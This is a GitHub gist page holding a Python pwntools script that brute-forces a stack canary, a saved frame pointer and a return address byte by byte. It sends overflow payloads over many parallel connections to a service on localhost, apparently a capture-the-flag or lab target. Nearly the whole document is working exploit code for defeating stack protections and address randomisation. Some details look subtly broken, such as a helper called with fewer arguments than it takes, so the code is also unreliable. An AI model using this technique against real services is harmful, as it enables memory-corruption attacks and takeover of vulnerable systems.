Skip to content

Instantly share code, notes, and snippets.

@nbulischeck

nbulischeck/bruteforce.py Secret

Created Feb 24, 2020
Embed
What would you like to do?
# -*- coding: utf-8 -*-
from pwn import *
from multiprocessing import Pool
context(os="linux", arch="amd64")
HOST, PORT = ("localhost", 10000)
canary = '' #p64(0x7c7a4f9b520b8000)
frame_ptr = '' #p64(0x7ffefc53f200)
ret_ptr = '' #p64(0x558923000502)
offset = 0x0
def die(error):
log.failure(error)
quit()
def leak(byte):
context.log_level = 'error'
r = remote(HOST, PORT)
payload = ''
payload += "\x90" * offset
payload += canary
payload += frame_ptr
payload += ret_ptr
payload += chr(byte)
try:
r.sendafter("admin:\n", payload, timeout=3)
res = r.recvuntil("Done.", timeout=3)
context.log_level = 'info'
return True
except:
context.log_level = 'info'
return False
def leak_helper(l, string):
pool = Pool(processes=25)
result = pool.map(leak, range(0, 256))
pool.close()
pool.terminate()
pool.join()
if True in result:
byte = result.index(True)
return string + chr(byte)
else:
die("Could not find byte!")
if not canary:
log.info('Brute forcing the stack canary')
with log.progress("Found Bytes") as l:
for i in p64(0x0):
canary = leak_helper(canary)
l.status(str([ord(i) for i in canary]))
l.success("Done!\nCanary: " + hex(u64(canary)))
if not frame_ptr:
log.info('Brute forcing the frame pointer')
with log.progress("Found Bytes") as l:
for i in p64(0x0):
frame_ptr = leak_helper(frame_ptr)
l.status(str([ord(i) for i in frame_ptr]))
l.success("Done!\nFrame Pointer: " + hex(u64(frame_ptr)))
if not ret_ptr:
log.info('Brute forcing the return pointer')
with log.progress("Found Bytes") as l:
for i in p64(0x0):
ret_ptr = leak_helper(ret_ptr)
l.status(str([ord(i) for i in ret_ptr]))
l.success("Done!\nReturn Pointer: " + hex(u64(ret_ptr)))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.